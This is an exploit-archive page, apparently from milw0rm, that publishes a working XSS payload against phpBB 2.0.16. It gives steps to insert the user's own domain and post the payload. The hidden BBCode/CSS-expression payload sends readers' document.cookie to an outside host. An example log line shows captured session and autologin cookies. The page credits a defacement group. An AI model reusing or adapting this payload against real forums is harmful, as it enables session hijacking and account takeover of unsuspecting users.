[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit
# Published : 2005-07-08
# Author : D|ablo
# Previous Title : WebAPP v0.9.9.2.1 Remote Command Execution Exploit (1st)
# Next Title : Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit
/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.
Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500]
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"
/str0ke
*/
******************************************************************************************************
* CCTEAM PhpBB 2.0.16 XSS EXPLOIT *
* Powered by D|ablo CCTEAM *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
******************************************************************************************************
* http://ccteam.ru/ *
* http://defacers.ru/ *
******************************************************************************************************
# www.Syue.com [2005-07-08]